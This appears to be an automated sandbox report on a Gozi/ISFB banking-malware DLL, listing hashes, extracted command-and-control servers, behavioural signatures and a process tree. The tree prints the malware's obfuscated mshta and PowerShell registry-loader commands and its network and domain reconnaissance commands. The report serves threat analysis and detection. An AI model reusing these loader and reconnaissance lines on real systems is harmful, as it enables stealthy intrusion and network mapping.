Analysis
- max time kernel: 150s
- max time network: 125s
- platform: windows10-2004_x64
- resource: win10v2004-20220721-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 03-08-2022 16:03
Static task: static1
Behavioral task: behavioral1
Sample: de00c4750accf516704b8c0df265c24a.dll
Resource: win7-20220715-en
General
- Target: de00c4750accf516704b8c0df265c24a.dll
- Size: 300KB
- MD5: de00c4750accf516704b8c0df265c24a
- SHA1: eddbc6019ec7ba82d3c5b4c59efe797ff1df9f75
- SHA256: 7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc
- SHA512: b0e6bbbdae36bd81f63dbab9296515d3a389fa6acb397476058ae202e66026ca8dc523fb35c6b7145a87d6e61e3833e396873e61e733152ccbaa39387bada96f
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
37.120.206.71
37.120.206.84
193.106.191.163
- base_path: /drew/
- build: 250240
- exe_type: loader
- extension: .jlk
- server_id: 50
Extracted
gozi_ifsb
3000
37.120.206.91
37.120.206.95
havefuntxmm.at
5.42.199.57
xerkdeoleone.at
- base_path: /images/
- build: 250240
- exe_type: worker
- extension: .jlk
- server_id: 50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: mshta.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | mshta.exe
-
Suspicious use of SetThreadContext 6 IoCs
Processes: powershell.exe, Explorer.EXE
description | pid | process | target process
PID 3932 set thread context of 3020 | 3932 | powershell.exe | Explorer.EXE
PID 3020 set thread context of 3448 | 3020 | Explorer.EXE | RuntimeBroker.exe
PID 3020 set thread context of 3720 | 3020 | Explorer.EXE | RuntimeBroker.exe
PID 3020 set thread context of 4104 | 3020 | Explorer.EXE | RuntimeBroker.exe
PID 3020 set thread context of 536 | 3020 | Explorer.EXE | RuntimeBroker.exe
PID 3020 set thread context of 2616 | 3020 | Explorer.EXE | cmd.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
Processes: net.exe
pid | process
1160 | net.exe
4036 | net.exe
4892 | net.exe
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies registry class 64 IoCs
Processes: RuntimeBroker.exe
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: regsvr32.exe, powershell.exe, Explorer.EXE
pid | process
1816 | regsvr32.exe
3932 | powershell.exe
3020 | Explorer.EXE
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: Explorer.EXE
pid | process
3020 | Explorer.EXE
-
Suspicious behavior: MapViewOfSection 6 IoCs
Processes: powershell.exe, Explorer.EXE
pid | process
3932 | powershell.exe
3020 | Explorer.EXE
-
Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes: powershell.exe, Explorer.EXE, RuntimeBroker.exe, WMIC.exe, tasklist.exe
description | pid | process
Token: SeDebugPrivilege | 3932 | powershell.exe
Token: SeShutdownPrivilege | 3020 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3020 | Explorer.EXE
Token: SeShutdownPrivilege | 3448 | RuntimeBroker.exe
Token: SeIncreaseQuotaPrivilege | 3656 | WMIC.exe
Token: SeSecurityPrivilege | 3656 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 3656 | WMIC.exe
Token: SeLoadDriverPrivilege | 3656 | WMIC.exe
Token: SeSystemProfilePrivilege | 3656 | WMIC.exe
Token: SeSystemtimePrivilege | 3656 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 3656 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 3656 | WMIC.exe
Token: SeCreatePagefilePrivilege | 3656 | WMIC.exe
Token: SeBackupPrivilege | 3656 | WMIC.exe
Token: SeRestorePrivilege | 3656 | WMIC.exe
Token: SeShutdownPrivilege | 3656 | WMIC.exe
Token: SeDebugPrivilege | 3656 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 3656 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 3656 | WMIC.exe
Token: SeUndockPrivilege | 3656 | WMIC.exe
Token: SeManageVolumePrivilege | 3656 | WMIC.exe
Token: 33 | 3656 | WMIC.exe
Token: 34 | 3656 | WMIC.exe
Token: 35 | 3656 | WMIC.exe
Token: 36 | 3656 | WMIC.exe
Token: SeDebugPrivilege | 3144 | tasklist.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes: Explorer.EXE
pid | process
3020 | Explorer.EXE
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: regsvr32.exe, mshta.exe, powershell.exe, csc.exe, Explorer.EXE, cmd.exe
description | pid | process | target process
PID 844 wrote to memory of 1816 | 844 | regsvr32.exe | regsvr32.exe
PID 4424 wrote to memory of 3932 | 4424 | mshta.exe | powershell.exe
PID 3932 wrote to memory of 516 | 3932 | powershell.exe | csc.exe
PID 516 wrote to memory of 2720 | 516 | csc.exe | cvtres.exe
PID 3932 wrote to memory of 696 | 3932 | powershell.exe | csc.exe
PID 696 wrote to memory of 1932 | 696 | csc.exe | cvtres.exe
PID 3932 wrote to memory of 3020 | 3932 | powershell.exe | Explorer.EXE
PID 3020 wrote to memory of 3448 | 3020 | Explorer.EXE | RuntimeBroker.exe
PID 3020 wrote to memory of 3720 | 3020 | Explorer.EXE | RuntimeBroker.exe
PID 3020 wrote to memory of 4104 | 3020 | Explorer.EXE | RuntimeBroker.exe
PID 3020 wrote to memory of 536 | 3020 | Explorer.EXE | RuntimeBroker.exe
PID 3020 wrote to memory of 1860 | 3020 | Explorer.EXE | cmd.exe
PID 3020 wrote to memory of 2616 | 3020 | Explorer.EXE | cmd.exe
PID 1860 wrote to memory of 3656 | 1860 | cmd.exe | WMIC.exe
PID 1860 wrote to memory of 1344 | 1860 | cmd.exe | more.com
PID 3020 wrote to memory of 5028 | 3020 | Explorer.EXE | cmd.exe
PID 3020 wrote to memory of 2876 | 3020 | Explorer.EXE | cmd.exe
PID 2876 wrote to memory of 4020 | 2876 | cmd.exe | systeminfo.exe
PID 3020 wrote to memory of 3936 | 3020 | Explorer.EXE | cmd.exe
PID 3020 wrote to memory of 4668 | 3020 | Explorer.EXE | cmd.exe
PID 4668 wrote to memory of 1160 | 4668 | cmd.exe | net.exe
PID 3020 wrote to memory of 4240 | 3020 | Explorer.EXE | cmd.exe
PID 3020 wrote to memory of 4452 | 3020 | Explorer.EXE | cmd.exe
PID 4452 wrote to memory of 4388 | 4452 | cmd.exe | nslookup.exe
PID 3020 wrote to memory of 4448 | 3020 | Explorer.EXE | cmd.exe
Processes
- C:\Windows\System32\RuntimeBroker.exe (PID:3448)
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\regsvr32.exe (PID:844)
  regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\regsvr32.exe (PID:1816)
    /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
    - Suspicious behavior: EnumeratesProcesses
- C:\Windows\System32\RuntimeBroker.exe (PID:4104)
  C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe (PID:3720)
  C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\Explorer.EXE (PID:3020)
  C:\Windows\Explorer.EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\mshta.exe (PID:4424)
    "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shab='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shab).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID:3932)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nttbepxbbx -value gp; new-alias -name apawnvggm -value iex; apawnvggm ([System.Text.Encoding]::ASCII.GetString((nttbepxbbx "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID:516)
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline"
        - Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID:2720)
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp" "c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP"
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID:696)
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline"
        - Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID:1932)
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp" "c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP"
  - C:\Windows\syswow64\cmd.exe (PID:2616)
    "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  - C:\Windows\system32\cmd.exe (PID:1860)
    cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\6602.bin1"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\Wbem\WMIC.exe (PID:3656)
      wmic computersystem get domain
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\more.com (PID:1344)
      more
  - C:\Windows\system32\cmd.exe (PID:5028)
    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
  - C:\Windows\system32\cmd.exe (PID:2876)
    cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\6602.bin1"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\systeminfo.exe (PID:4020)
      systeminfo.exe
      - Gathers system information
  - C:\Windows\system32\cmd.exe (PID:3936)
    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
  - C:\Windows\system32\cmd.exe (PID:4668)
    cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net.exe (PID:1160)
      net view
      - Discovers systems in the same network
  - C:\Windows\system32\cmd.exe (PID:4240)
    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
  - C:\Windows\system32\cmd.exe (PID:4452)
    cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\nslookup.exe (PID:4388)
      nslookup 127.0.0.1
  - C:\Windows\system32\cmd.exe (PID:4448)
    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
  - C:\Windows\system32\cmd.exe (PID:2232)
    cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
    - C:\Windows\system32\tasklist.exe (PID:3144)
      tasklist.exe /SVC
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID:2728)
    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
  - C:\Windows\system32\cmd.exe (PID:3576)
    cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
    - C:\Windows\system32\driverquery.exe (PID:3936)
      driverquery.exe
  - C:\Windows\system32\cmd.exe (PID:4472)
    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
  - C:\Windows\system32\cmd.exe (PID:3484)
    cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
    - C:\Windows\system32\reg.exe (PID:4616)
      reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
  - C:\Windows\system32\cmd.exe (PID:2256)
    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
  - C:\Windows\system32\cmd.exe (PID:3516)
    cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
    - C:\Windows\system32\net.exe (PID:1152)
      net config workstation
      - C:\Windows\system32\net1.exe (PID:4456)
        C:\Windows\system32\net1 config workstation
  - C:\Windows\system32\cmd.exe (PID:2400)
    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
  - C:\Windows\system32\cmd.exe (PID:1976)
    cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
    - C:\Windows\system32\nltest.exe (PID:2588)
      nltest /domain_trusts
  - C:\Windows\system32\cmd.exe (PID:4276)
    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
  - C:\Windows\system32\cmd.exe (PID:4912)
    cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
    - C:\Windows\system32\nltest.exe (PID:5012)
      nltest /domain_trusts /all_trusts
  - C:\Windows\system32\cmd.exe (PID:844)
    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
  - C:\Windows\system32\cmd.exe (PID:920)
    cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
    - C:\Windows\system32\net.exe (PID:4036)
      net view /all /domain
      - Discovers systems in the same network
  - C:\Windows\system32\cmd.exe (PID:1092)
    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
  - C:\Windows\system32\cmd.exe (PID:2528)
    cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
    - C:\Windows\system32\net.exe (PID:4892)
      net view /all
      - Discovers systems in the same network
  - C:\Windows\system32\cmd.exe (PID:5088)
    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
  - C:\Windows\system32\cmd.exe (PID:1980)
    cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\6602.bin1 > C:\Users\Admin\AppData\Local\Temp\6602.bin & del C:\Users\Admin\AppData\Local\Temp\6602.bin1"
- C:\Windows\System32\RuntimeBroker.exe (PID:536)
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Modifies registry class
Network
MITRE ATT&CK Enterprise v6
Downloads